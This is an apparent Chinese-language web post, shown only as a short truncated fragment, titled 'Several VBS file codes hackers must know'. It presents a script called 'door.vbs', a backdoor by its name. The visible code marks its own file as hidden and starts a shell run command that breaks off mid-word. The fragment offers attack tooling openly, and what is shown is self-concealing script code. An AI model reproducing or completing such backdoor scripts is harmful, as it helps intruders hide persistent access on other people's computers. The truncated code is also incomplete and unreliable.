黑客必须要知道的几个vbs文件代码
2016-07-27
41
1.door.vbs "*************** "door.vbsby黑嘿黑 "*************** dimwsh,FA,FSO setfso=CreateObject("Scripting.FileSystemObject") SetFA=FSO.GetFile(WScript.scriptFullName) FA.Attributes=34 setwsh=CreateObject("WScript.Shell") wsh.run"ne...